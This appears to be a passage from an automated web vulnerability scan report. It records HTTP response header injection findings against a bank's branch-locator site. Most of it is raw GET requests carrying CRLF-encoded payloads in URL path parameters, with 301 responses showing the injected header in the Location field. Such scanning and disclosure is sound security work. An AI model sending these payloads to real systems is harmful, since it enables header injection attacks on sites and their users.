searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:46:05 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=B241E63571C01272647059EEC4A66654.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/a04e7 478f6ad321f=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 4a004%0d%0a621cc812f95 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/4a004%0d%0a621cc812f95/bank_branch_locations/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:48:03 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=4A6094289CBA92B51E2D8934AF0A78F7.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/4a004 621cc812f95/bank_branch_locations/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 9383d%0d%0adbb9e213fca was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/110__Third__Ave_10003_NEW__YORK_NY/9383d%0d%0adbb9e213fca/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:46:25 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=9225E65174FBF32A5E52C174E2FB7A09.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/9383d dbb9e213fca/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 69073%0d%0ac18fdffd89a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/69073%0d%0ac18fdffd89a/bank_branch_locations/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:46:26 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=EDEBB9CB2790E306B830C8186E92113C.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/69073 c18fdffd89a/bank_branch_locations/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload fdb77%0d%0afd7a4849a97 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/110__Third__Ave_10003_NEW__YORK_NY/fdb77%0d%0afd7a4849a97/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:45:01 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=1470DDD096457B9C754890E53A03EC14.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/fdb77 fd7a4849a97/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 31df3%0d%0aaebef96e9dc was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/31df3%0d%0aaebef96e9dc=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:46:29 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=FDA1CF51224090ED5F5C21B086111792.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/31df3 aebef96e9dc=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload eb6a0%0d%0a3dd8b96fd06 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/eb6a0%0d%0a3dd8b96fd06/bank_branch_locations/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:48:01 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=0431486A7A09356C852F884CBADD780F.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/eb6a0 3dd8b96fd06/bank_branch_locations/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 5410a%0d%0abb1a08296ca was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/5410a%0d%0abb1a08296ca/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:46:23 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=1FA9195361D6B7F06114CBB0617E0E5E.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/5410a bb1a08296ca/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 165f1%0d%0abca7c7ee0df was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/165f1%0d%0abca7c7ee0df/bank_branch_locations/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; 